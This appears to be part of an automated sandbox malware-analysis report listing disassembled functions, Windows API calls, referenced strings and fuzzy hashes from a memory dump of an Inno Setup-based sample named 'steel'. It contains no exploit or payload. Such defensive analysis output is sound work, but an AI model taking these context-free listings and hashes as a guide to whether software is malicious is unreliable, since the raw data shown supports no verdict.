                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: InitializeWizard
                                                                                            • API String ID: 2558294473-2356795471
                                                                                            • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                            • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
• Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
APIs
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
Strings
• Inno Setup: Setup Version, xrefs: 0046EE65
Similarity
• API ID: Value
• String ID: Inno Setup: Setup Version
• API String ID: 3702945584-4166306022
• Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
• Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
• Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
• Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
APIs
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
Similarity
• API ID: Value
• String ID: NoModify
• API String ID: 3702945584-1699962838
• Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
• Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
• Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
• Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
  • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
  • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
  • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
• SendNotifyMessageA.USER32(0002043C,00000496,00002711,-00000001), ref: 0047E6BA
Similarity
• API ID: EnumFontsMessageNotifyReleaseSend
• String ID:
• API String ID: 2649214853-0
• Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
• Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
• Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
• Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
  • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
Similarity
• API ID: ByteCharMetricsMultiSystemWide
• String ID: /G
• API String ID: 224039744-2088674125
• Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
• Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
• Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
• Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
APIs
• RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
• RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
Similarity
• API ID: CloseEnum
• String ID:
• API String ID: 2818636725-0
• Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
• Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
• Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
• Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
APIs
• CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
• GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
Similarity
• API ID: CreateErrorLastProcess
• String ID:
• API String ID: 2919029540-0
• Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
• Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
• Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
• Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
APIs
• FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
• FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
Similarity
• API ID: Resource$FindFree
• String ID:
• API String ID: 4097029671-0
• Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
• Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
• Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
• Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
APIs
• GetCurrentThreadId.KERNEL32 ref: 0041EEF3
• EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
Similarity
• API ID: Thread$CurrentEnumWindows
• String ID:
• API String ID: 2396873506-0
• Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
• Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
• Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
• Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
• GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
Similarity
• API ID: ErrorFileLastMove
• String ID:
• API String ID: 55378915-0
• Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
• Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
• Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
• Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
• GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                            • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                            Similarity
                                                                                            • API ID: CursorLoad
                                                                                            • String ID:
                                                                                            • API String ID: 3238433803-0
                                                                                            • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                            • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                            • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                            APIs
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                            • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: FolderFreeKnownPathTask
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 969438705-544719455
                                                                                            • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                            • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                            • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                            • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                            • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                            • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                            • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                            • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                              • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                            • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                            • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                            • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                            APIs
                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                            Similarity
                                                                                            • API ID: InfoScroll
                                                                                            • String ID:
                                                                                            • API String ID: 629608716-0
                                                                                            • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                            • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                            • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                            • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                            APIs
                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                              • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                              • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                            Similarity
                                                                                            • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3319771486-0
                                                                                            • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                            • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                            • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                            • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                            • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                            • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                            • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                            • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                            • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                            • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                            • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                            • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                            • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                            • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                            • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                            • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                            APIs
                                                                                            • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                            Similarity
                                                                                            • API ID: ExtentPointText
                                                                                            • String ID:
                                                                                            • API String ID: 566491939-0
                                                                                            • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                            • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                            • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                            • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                            APIs
                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                            • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                            • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                            • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                            APIs
                                                                                            • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                            • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                            • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                            • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                            • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                            • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                            • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                            APIs
                                                                                              • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                            • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                              • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                            Memory Dump Source
